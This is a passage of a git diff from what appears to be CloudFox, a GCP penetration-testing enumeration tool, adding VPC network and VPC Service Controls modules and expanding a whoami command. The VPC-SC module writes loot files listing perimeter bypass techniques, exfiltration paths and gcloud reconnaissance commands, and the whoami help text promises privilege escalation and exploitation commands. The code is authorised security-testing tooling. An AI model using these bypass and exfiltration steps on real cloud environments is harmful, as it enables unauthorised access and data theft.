m.LootMap[projectID]["vpcnetworks-diagram"] = &internal.LootFile{ + Name: "vpcnetworks-diagram", + Contents: diagram, + } + break // Only add once for flat output + } + + // For hierarchical output, add to all projects + if m.Hierarchy != nil && !m.FlatOutput { + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["vpcnetworks-diagram"] = &internal.LootFile{ + Name: "vpcnetworks-diagram", + Contents: diagram, + } + } + } + } + + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// ------------------------------ +// Diagram Generation +// ------------------------------ + +// generateVPCNetworksDiagram creates an ASCII visualization of VPC networks +func (m *VPCNetworksModule) generateVPCNetworksDiagram() string { + allNetworks := m.getAllNetworks() + if len(allNetworks) == 0 { + return "" + } + + // Convert networks to diagram service types + diagramNetworks := make([]diagramservice.NetworkInfo, 0, len(allNetworks)) + for _, n := range allNetworks { + diagramNetworks = append(diagramNetworks, diagramservice.NetworkInfo{ + Name: n.Name, + ProjectID: n.ProjectID, + RoutingMode: n.RoutingMode, + MTU: 0, // VPCNetworkInfo doesn't have MTU + IsSharedVPC: false, + SharedVPCRole: "", + PeeringCount: len(n.Peerings), + }) + } + + // Build subnets by network + subnetsByNetwork := make(map[string][]diagramservice.SubnetInfo) + for _, s := range m.getAllSubnets() { + key := s.ProjectID + "/" + s.Network + subnetsByNetwork[key] = append(subnetsByNetwork[key], diagramservice.SubnetInfo{ + Name: s.Name, + Region: s.Region, + IPCIDRRange: s.IPCidrRange, + PrivateIPGoogleAccess: s.PrivateIPGoogleAccess, + FlowLogsEnabled: s.EnableFlowLogs, + }) + } + + // Convert peerings to diagram service types + diagramPeerings := make([]diagramservice.VPCPeeringInfo, 0, len(m.getAllPeerings())) + for _, p := range m.getAllPeerings() { + diagramPeerings = append(diagramPeerings, diagramservice.VPCPeeringInfo{ + Name: p.Name, + Network: p.Network, + PeerNetwork: p.PeerNetwork, + PeerProjectID: p.PeerProjectID, + State: p.State, + ExportRoutes: p.ExportCustomRoutes, + ImportRoutes: p.ImportCustomRoutes, + }) + } + + // Determine project ID for header (use first project if multiple) + projectID := "" + if len(m.ProjectIDs) == 1 { + projectID = m.ProjectIDs[0] + } + + return diagramservice.DrawVPCNetworksDiagram(diagramNetworks, subnetsByNetwork, diagramPeerings, projectID, 90) +} + +func (m *VPCNetworksModule) getNetworksHeader() []string { + return []string{"Project", "Name", "Routing Mode", "Auto Subnets", "Subnets", "Peerings"} +} + +func (m *VPCNetworksModule) getSubnetsHeader() []string { + return []string{"Project", "Name", "Network", "Region", "CIDR", "Private Access", "Flow Logs"} +} + +func (m *VPCNetworksModule) getPeeringsHeader() []string { + return []string{"Project", "Name", "Network", "Peer Network", "Peer Project", "State", "Export Routes", "Import Routes"} +} + +func (m *VPCNetworksModule) getRoutesHeader() []string { + return []string{"Project", "Name", "Network", "Dest Range", "Next Hop Type", "Next Hop", "Priority"} +} + +func (m *VPCNetworksModule) networksToTableBody(networks []vpcservice.VPCNetworkInfo) [][]string { + var body [][]string + for _, network := range networks { + autoSubnets := "No" + if network.AutoCreateSubnetworks { + autoSubnets = "Yes" + } + body = append(body, []string{ + m.GetProjectName(network.ProjectID), + network.Name, + network.RoutingMode, + autoSubnets, + fmt.Sprintf("%d", len(network.Subnetworks)), + fmt.Sprintf("%d", len(network.Peerings)), + }) + } + return body +} + +func (m *VPCNetworksModule) subnetsToTableBody(subnets []vpcservice.SubnetInfo) [][]string { + var body [][]string + for _, subnet := range subnets { + privateAccess := "No" + if subnet.PrivateIPGoogleAccess { + privateAccess = "Yes" + } + flowLogs := "No" + if subnet.EnableFlowLogs { + flowLogs = "Yes" + } + body = append(body, []string{ + m.GetProjectName(subnet.ProjectID), + subnet.Name, + subnet.Network, + subnet.Region, + subnet.IPCidrRange, + privateAccess, + flowLogs, + }) + } + return body +} + +func (m *VPCNetworksModule) peeringsToTableBody(peerings []vpcservice.VPCPeeringInfo) [][]string { + var body [][]string + for _, peering := range peerings { + peerProject := peering.PeerProjectID + if peerProject == "" { + peerProject = "-" + } + exportRoutes := "No" + if peering.ExportCustomRoutes { + exportRoutes = "Yes" + } + importRoutes := "No" + if peering.ImportCustomRoutes { + importRoutes = "Yes" + } + body = append(body, []string{ + m.GetProjectName(peering.ProjectID), + peering.Name, + peering.Network, + peering.PeerNetwork, + peerProject, + peering.State, + exportRoutes, + importRoutes, + }) + } + return body +} + +func (m *VPCNetworksModule) routesToTableBody(routes []vpcservice.RouteInfo) [][]string { + var body [][]string + // Filter to custom routes only + for _, route := range routes { + if strings.HasPrefix(route.Name, "default-route-") { + continue + } + body = append(body, []string{ + m.GetProjectName(route.ProjectID), + route.Name, + route.Network, + route.DestRange, + route.NextHopType, + route.NextHop, + fmt.Sprintf("%d", route.Priority), + }) + } + return body +} + +func (m *VPCNetworksModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if networks, ok := m.ProjectNetworks[projectID]; ok && len(networks) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "vpc-networks", + Header: m.getNetworksHeader(), + Body: m.networksToTableBody(networks), + }) + } + + if subnets, ok := m.ProjectSubnets[projectID]; ok && len(subnets) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "subnets", + Header: m.getSubnetsHeader(), + Body: m.subnetsToTableBody(subnets), + }) + } + + if peerings, ok := m.ProjectPeerings[projectID]; ok && len(peerings) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "vpc-peerings", + Header: m.getPeeringsHeader(), + Body: m.peeringsToTableBody(peerings), + }) + } + + if routes, ok := m.ProjectRoutes[projectID]; ok && len(routes) > 0 { + routeBody := m.routesToTableBody(routes) + if len(routeBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "custom-routes", + Header: m.getRoutesHeader(), + Body: routeBody, + }) + } + } + + return tableFiles +} + +func (m *VPCNetworksModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectNetworks { + projectIDs[projectID] = true + } + for projectID := range m.ProjectSubnets { + projectIDs[projectID] = true + } + for projectID := range m.ProjectPeerings { + projectIDs[projectID] = true + } + for projectID := range m.ProjectRoutes { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = VPCNetworksOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_VPCNETWORKS_MODULE_NAME) + } +} + +func (m *VPCNetworksModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allNetworks := m.getAllNetworks() + allSubnets := m.getAllSubnets() + allPeerings := m.getAllPeerings() + allRoutes := m.getAllRoutes() + + var tables []internal.TableFile + + if len(allNetworks) > 0 { + tables = append(tables, internal.TableFile{ + Name: "vpc-networks", + Header: m.getNetworksHeader(), + Body: m.networksToTableBody(allNetworks), + }) + } + + if len(allSubnets) > 0 { + tables = append(tables, internal.TableFile{ + Name: "subnets", + Header: m.getSubnetsHeader(), + Body: m.subnetsToTableBody(allSubnets), + }) + } + + if len(allPeerings) > 0 { + tables = append(tables, internal.TableFile{ + Name: "vpc-peerings", + Header: m.getPeeringsHeader(), + Body: m.peeringsToTableBody(allPeerings), + }) + } + + routeBody := m.routesToTableBody(allRoutes) + if len(routeBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "custom-routes", + Header: m.getRoutesHeader(), + Body: routeBody, + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := VPCNetworksOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_VPCNETWORKS_MODULE_NAME) + } +} diff --git a/gcp/commands/vpcsc.go b/gcp/commands/vpcsc.go new file mode 100644 index 00000000..92ff8ef0 --- /dev/null +++ b/gcp/commands/vpcsc.go @@ -0,0 +1,453 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" + vpcscservice "github.com/BishopFox/cloudfox/gcp/services/vpcscService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var orgID string + +var GCPVPCSCCommand = &cobra.Command{ + Use: globals.GCP_VPCSC_MODULE_NAME, + Aliases: []string{"vpcsc", "service-controls", "sc"}, + Short: "Enumerate VPC Service Controls", + Long: `Enumerate VPC Service Controls configuration. + +Features: +- Lists access policies for the organization +- Enumerates service perimeters (regular and bridge) +- Shows access levels and their conditions +- Identifies overly permissive configurations +- Analyzes ingress/egress policies + +Note: Organization ID is auto-discovered from project ancestry. Use --org flag to override.`, + Run: runGCPVPCSCCommand, +} + +func init() { + GCPVPCSCCommand.Flags().StringVar(&orgID, "org", "", "Organization ID (auto-discovered if not provided)") +} + +type VPCSCModule struct { + gcpinternal.BaseGCPModule + OrgID string + Policies []vpcscservice.AccessPolicyInfo + Perimeters []vpcscservice.ServicePerimeterInfo + AccessLevels []vpcscservice.AccessLevelInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type VPCSCOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o VPCSCOutput) TableFiles() []internal.TableFile { return o.Table } +func (o VPCSCOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPVPCSCCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_VPCSC_MODULE_NAME) + if err != nil { + return + } + + // Auto-discover org ID if not provided + effectiveOrgID := orgID + if effectiveOrgID == "" { + cmdCtx.Logger.InfoM("Auto-discovering organization ID...", globals.GCP_VPCSC_MODULE_NAME) + orgsSvc := orgsservice.New() + + // Method 1: Try to get org ID from project ancestry + if len(cmdCtx.ProjectIDs) > 0 { + discoveredOrgID, err := orgsSvc.GetOrganizationIDFromProject(cmdCtx.ProjectIDs[0]) + if err == nil { + effectiveOrgID = discoveredOrgID + cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered organization ID from project ancestry: %s", effectiveOrgID), globals.GCP_VPCSC_MODULE_NAME) + } + } + + // Method 2: Fallback to searching for accessible organizations + if effectiveOrgID == "" { + orgs, err := orgsSvc.SearchOrganizations() + if err == nil && len(orgs) > 0 { + // Extract org ID from name (format: "organizations/ORGID") + effectiveOrgID = strings.TrimPrefix(orgs[0].Name, "organizations/") + cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered organization ID from search: %s (%s)", effectiveOrgID, orgs[0].DisplayName), globals.GCP_VPCSC_MODULE_NAME) + } + } + + // If still no org ID found, error out + if effectiveOrgID == "" { + cmdCtx.Logger.ErrorM("Could not auto-discover organization ID. Use --org flag to specify.", globals.GCP_VPCSC_MODULE_NAME) + return + } + } + + module := &VPCSCModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + OrgID: effectiveOrgID, + Policies: []vpcscservice.AccessPolicyInfo{}, + Perimeters: []vpcscservice.ServicePerimeterInfo{}, + AccessLevels: []vpcscservice.AccessLevelInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *VPCSCModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM(fmt.Sprintf("Enumerating VPC Service Controls for organization: %s", m.OrgID), globals.GCP_VPCSC_MODULE_NAME) + + svc := vpcscservice.New() + + // List access policies + policies, err := svc.ListAccessPolicies(m.OrgID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + fmt.Sprintf("Could not list access policies for organization %s", m.OrgID)) + return + } + m.Policies = policies + + if len(m.Policies) == 0 { + logger.InfoM("No access policies found", globals.GCP_VPCSC_MODULE_NAME) + return + } + + // For each policy, list perimeters and access levels + for _, policy := range m.Policies { + perimeters, err := svc.ListServicePerimeters(policy.Name) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + fmt.Sprintf("Could not list perimeters for policy %s", policy.Name)) + } else { + m.Perimeters = append(m.Perimeters, perimeters...) + } + + levels, err := svc.ListAccessLevels(policy.Name) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + fmt.Sprintf("Could not list access levels for policy %s", policy.Name)) + } else { + m.AccessLevels = append(m.AccessLevels, levels...) + } + } + + m.addAllToLoot() + + logger.SuccessM(fmt.Sprintf("Found %d access policy(ies), %d perimeter(s), %d access level(s)", + len(m.Policies), len(m.Perimeters), len(m.AccessLevels)), globals.GCP_VPCSC_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *VPCSCModule) initializeLootFiles() { + m.LootMap["vpcsc-commands"] = &internal.LootFile{ + Name: "vpcsc-commands", + Contents: "# VPC Service Controls Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *VPCSCModule) addAllToLoot() { + // Add policies to loot + for _, policy := range m.Policies { + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# POLICY: %s\n"+ + "# =============================================================================\n"+ + "# Title: %s\n"+ + "# Parent: %s\n"+ + "\n# Describe access policy:\n"+ + "gcloud access-context-manager policies describe %s\n\n"+ + "# List perimeters:\n"+ + "gcloud access-context-manager perimeters list --policy=%s\n\n"+ + "# List access levels:\n"+ + "gcloud access-context-manager levels list --policy=%s\n\n", + policy.Name, policy.Title, policy.Parent, + policy.Name, policy.Name, policy.Name, + ) + } + + // Add perimeters to loot + for _, perimeter := range m.Perimeters { + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# PERIMETER: %s (Policy: %s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Title: %s\n"+ + "# Type: %s\n"+ + "# Resources: %d\n"+ + "# Restricted Services: %d\n"+ + "# Ingress Policies: %d\n"+ + "# Egress Policies: %d\n"+ + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe perimeter:\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s\n\n"+ + "# List protected resources:\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=\"value(status.resources)\"\n\n"+ + "# List restricted services:\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.status.restrictedServices'\n\n"+ + "# List ingress policies (who can access from outside):\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.status.ingressPolicies'\n\n"+ + "# List egress policies (what can leave the perimeter):\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.status.egressPolicies'\n\n", + perimeter.Name, perimeter.PolicyName, + perimeter.Title, perimeter.PerimeterType, + len(perimeter.Resources), len(perimeter.RestrictedServices), + perimeter.IngressPolicyCount, perimeter.EgressPolicyCount, + perimeter.Name, perimeter.PolicyName, + perimeter.Name, perimeter.PolicyName, + perimeter.Name, perimeter.PolicyName, + perimeter.Name, perimeter.PolicyName, + perimeter.Name, perimeter.PolicyName, + ) + + // Exploit/bypass commands + m.LootMap["vpcsc-commands"].Contents += "# === EXPLOIT / BYPASS COMMANDS ===\n\n" + + if perimeter.IngressPolicyCount > 0 { + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# Ingress policies exist - check for overly permissive access:\n"+ + "# Review which identities/access levels are allowed ingress\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.status.ingressPolicies[] | {from: .ingressFrom, to: .ingressTo}'\n\n", + perimeter.Name, perimeter.PolicyName, + ) + } + + if perimeter.EgressPolicyCount > 0 { + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# Egress policies exist - check for data exfil paths:\n"+ + "# Review what services/resources can send data outside the perimeter\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.status.egressPolicies[] | {from: .egressFrom, to: .egressTo}'\n\n", + perimeter.Name, perimeter.PolicyName, + ) + } + + if perimeter.PerimeterType == "PERIMETER_TYPE_BRIDGE" { + m.LootMap["vpcsc-commands"].Contents += "# [FINDING] This is a BRIDGE perimeter - it connects two perimeters\n" + + "# Bridge perimeters can be used to exfiltrate data between perimeters\n" + + "# Check which perimeters are bridged and what services flow between them\n\n" + } + + // Common bypass techniques + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# VPC-SC Bypass Techniques:\n"+ + "# 1. If you have access to a project INSIDE the perimeter, use it as a pivot\n"+ + "# 2. Check if any access levels use overly permissive IP ranges\n"+ + "# 3. Look for services NOT in the restricted list (data can flow through unrestricted services)\n"+ + "# 4. Check for ingress policies that allow specific identities you control\n"+ + "# 5. Use Cloud Shell (if accessible) - it may bypass VPC-SC\n\n"+ + "# Test if you're inside the perimeter:\n"+ + "gcloud storage ls gs://BUCKET_IN_PERIMETER 2>&1 | grep -i 'Request is prohibited by organization'\n\n"+ + "# Check dry-run mode (violations logged but not blocked):\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.useExplicitDryRunSpec'\n\n", + perimeter.Name, perimeter.PolicyName, + ) + } + + // Add access levels to loot + for _, level := range m.AccessLevels { + ipSubnets := "-" + if len(level.IPSubnetworks) > 0 { + ipSubnets = strings.Join(level.IPSubnetworks, ", ") + } + regions := "-" + if len(level.Regions) > 0 { + regions = strings.Join(level.Regions, ", ") + } + + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# ACCESS LEVEL: %s (Policy: %s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Title: %s\n"+ + "# IP Subnets: %s\n"+ + "# Regions: %s\n"+ + "# Members: %d\n"+ + "\n# Describe access level:\n"+ + "gcloud access-context-manager levels describe %s --policy=%s\n\n", + level.Name, level.PolicyName, + level.Title, ipSubnets, regions, len(level.Members), + level.Name, level.PolicyName, + ) + } +} + +func (m *VPCSCModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *VPCSCModule) buildTables() []internal.TableFile { + var tables []internal.TableFile + + // Access Policies table + if len(m.Policies) > 0 { + policyHeader := []string{"Policy", "Title", "Parent", "Created", "Updated"} + var policyBody [][]string + for _, policy := range m.Policies { + policyBody = append(policyBody, []string{ + policy.Name, + policy.Title, + policy.Parent, + policy.CreateTime, + policy.UpdateTime, + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpcsc-policies", + Header: policyHeader, + Body: policyBody, + }) + } + + // Service Perimeters table + if len(m.Perimeters) > 0 { + perimeterHeader := []string{ + "Policy", "Name", "Title", "Type", "Resources", "Restricted Services", + "Ingress Policies", "Egress Policies", + } + var perimeterBody [][]string + for _, perimeter := range m.Perimeters { + perimeterBody = append(perimeterBody, []string{ + perimeter.PolicyName, + perimeter.Name, + perimeter.Title, + perimeter.PerimeterType, + fmt.Sprintf("%d", len(perimeter.Resources)), + fmt.Sprintf("%d", len(perimeter.RestrictedServices)), + fmt.Sprintf("%d", perimeter.IngressPolicyCount), + fmt.Sprintf("%d", perimeter.EgressPolicyCount), + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpcsc-perimeters", + Header: perimeterHeader, + Body: perimeterBody, + }) + } + + // Access Levels table - one row per member + if len(m.AccessLevels) > 0 { + levelHeader := []string{"Policy", "Name", "Title", "IP Subnets", "Regions", "Member"} + var levelBody [][]string + for _, level := range m.AccessLevels { + ipSubnets := "-" + if len(level.IPSubnetworks) > 0 { + ipSubnets = strings.Join(level.IPSubnetworks, ", ") + } + regions := "-" + if len(level.Regions) > 0 { + regions = strings.Join(level.Regions, ", ") + } + + if len(level.Members) > 0 { + // One row per member + for _, member := range level.Members { + levelBody = append(levelBody, []string{ + level.PolicyName, + level.Name, + level.Title, + ipSubnets, + regions, + member, + }) + } + } else { + // Access level with no members + levelBody = append(levelBody, []string{ + level.PolicyName, + level.Name, + level.Title, + ipSubnets, + regions, + "-", + }) + } + } + tables = append(tables, internal.TableFile{ + Name: "vpcsc-access-levels", + Header: levelHeader, + Body: levelBody, + }) + } + + return tables +} + +func (m *VPCSCModule) collectLootFiles() []internal.LootFile { + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +func (m *VPCSCModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := VPCSCOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output location - prefer org-level, fall back to project-level + orgID := "" + if m.OrgID != "" { + orgID = m.OrgID + } else if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + if orgID != "" { + // Place at org level + outputData.OrgLevelData[orgID] = output + } else if len(m.ProjectIDs) > 0 { + // Fall back to first project level if no org discovered + outputData.ProjectLevelData[m.ProjectIDs[0]] = output + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_VPCSC_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *VPCSCModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := VPCSCOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "org", []string{m.OrgID}, []string{m.OrgID}, m.Account, output) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + "Could not write output") + } +} diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index c686b7ba..8e101cde 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -1,34 +1,2064 @@ package commands import ( + "context" "fmt" + "strings" + "sync" + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" OAuthService "github.com/BishopFox/cloudfox/gcp/services/oauthService" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" + + cloudidentity "google.golang.org/api/cloudidentity/v1" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + crmv3 "google.golang.org/api/cloudresourcemanager/v3" ) +// Flags for whoami command +var whoamiExtended bool +var whoamiGroups []string +var whoamiGroupsFile string + var GCPWhoAmICommand = &cobra.Command{ - Use: globals.GCP_WHOAMI_MODULE_NAME, - Short: "Display the email address of the GCP authenticated user", - Args: cobra.NoArgs, - Run: runGCPWhoAmICommand, + Use: globals.GCP_WHOAMI_MODULE_NAME, + Aliases: []string{"identity", "me"}, + Short: "Display identity context for the authenticated GCP user/service account", + Long: `Display identity context for the authenticated GCP user/service account. + +Default output: +- Current identity details (email, type) +- Organization and folder context +- Effective role bindings across projects (with inheritance source) + +With --extended flag (adds): +- Service accounts that can be impersonated +- Privilege escalation opportunities +- Data exfiltration capabilities (compute exports, logging sinks, database exports, etc.) +- Lateral movement capabilities (VPC peering, OS Login, firewall modifications, etc.) +- Exploitation commands + +With --groups flag: +- Provide known group email addresses when group enumeration is permission denied +- Role bindings from these groups will be included in the output +- Use comma-separated list: --groups=group1@domain.com,group2@domain.com + +With --groupslist flag: +- Import groups from a file (one group per line) +- Same behavior as --groups but reads from file +- Example: --groupslist=groups.txt`, + Run: runGCPWhoAmICommand, +} + +func init() { + GCPWhoAmICommand.Flags().BoolVarP(&whoamiExtended, "extended", "e", false, "Enable extended enumeration (impersonation targets, privilege escalation paths)") + GCPWhoAmICommand.Flags().StringSliceVarP(&whoamiGroups, "groups", "g", []string{}, "Comma-separated list of known group email addresses (used when group enumeration is permission denied)") + GCPWhoAmICommand.Flags().StringVar(&whoamiGroupsFile, "groupslist", "", "Path to file containing group email addresses (one per line)") +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type IdentityContext struct { + Email string + Type string // "user" or "serviceAccount" + UniqueID string + ProjectIDs []string // Keep for backward compatibility + Projects []ProjectInfo // New: stores project ID and display name + Organizations []OrgInfo + Folders []FolderInfo + Groups []GroupMembership // Groups the identity is a member of + GroupsEnumerated bool // Whether group enumeration was successful + GroupsProvided []string // Groups provided via --groups flag + GroupsMismatch bool // True if provided groups differ from enumerated +} + +type ProjectInfo struct { + ProjectID string + DisplayName string +} + +type OrgInfo struct { + Name string + DisplayName string + OrgID string +} + +type FolderInfo struct { + Name string + DisplayName string + Parent string +} + +type GroupMembership struct { + GroupID string // e.g., "groups/abc123" + Email string // e.g., "security-team@example.com" + DisplayName string // e.g., "Security Team" + Source string // "enumerated" or "provided" +} + +type RoleBinding struct { + Role string + Scope string // "organization", "folder", "project" + ScopeID string + ScopeName string // Display name of the scope resource + Inherited bool + Condition string + InheritedFrom string // Source of binding: "direct", group email, or parent resource + MemberType string // "user", "serviceAccount", "group" +} + +type ImpersonationTarget struct { + ServiceAccount string + ProjectID string + CanImpersonate bool + CanCreateKeys bool + CanActAs bool +} + +type PrivilegeEscalationPath struct { + ProjectID string // GCP project ID + Permission string // The permission/method enabling privesc + Category string // Category of the privesc (SA Impersonation, Key Creation, etc.) + Description string + SourceRole string // The role that grants this potential path + SourceScope string // Where the role is granted (project ID, folder, org) + Command string // Exploit command (for loot file only) + Confidence string // "confirmed" (verified via API) or "potential" (inferred from role) + RequiredPerms string // Specific permissions needed for this path } +// DataExfilCapability represents a data exfiltration capability for the current identity +type DataExfilCapability struct { + ProjectID string + Permission string + Category string + Description string + SourceRole string // The role/principal that grants this capability + SourceScope string // Where the role is granted (project, folder, org) +} + +// LateralMoveCapability represents a lateral movement capability for the current identity +type LateralMoveCapability struct { + ProjectID string + Permission string + Category string + Description string + SourceRole string // The role/principal that grants this capability + SourceScope string // Where the role is granted (project, folder, org) +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type WhoAmIModule struct { + gcpinternal.BaseGCPModule + + Identity IdentityContext + RoleBindings []RoleBinding + ImpersonationTargets []ImpersonationTarget + PrivEscPaths []PrivilegeEscalationPath + DataExfilCapabilities []DataExfilCapability + LateralMoveCapabilities []LateralMoveCapability + DangerousPermissions []string + LootMap map[string]*internal.LootFile + Extended bool + ProvidedGroups []string // Groups provided via --groups flag + mu sync.Mutex + + // FoxMapper findings - store the full findings for detailed path visualization + FoxMapperPrivescFindings []foxmapperservice.PrivescFinding + FoxMapperLateralFindings []foxmapperservice.LateralFinding + FoxMapperDataExfilFindings []foxmapperservice.DataExfilFinding + FoxMapperService *foxmapperservice.FoxMapperService +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type WhoAmIOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o WhoAmIOutput) TableFiles() []internal.TableFile { return o.Table } +func (o WhoAmIOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ func runGCPWhoAmICommand(cmd *cobra.Command, args []string) { - logger := internal.NewLogger() + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_WHOAMI_MODULE_NAME) + if err != nil { + return + } - // Initialize the OAuthService - oauthService := OAuthService.NewOAuthService() + // Combine groups from --groups flag and --groupslist file + allGroups := whoamiGroups + if whoamiGroupsFile != "" { + fileGroups := internal.LoadFileLinesIntoArray(whoamiGroupsFile) + allGroups = append(allGroups, fileGroups...) + } - // Call the WhoAmI function + // Create module instance + module := &WhoAmIModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + RoleBindings: []RoleBinding{}, + ImpersonationTargets: []ImpersonationTarget{}, + 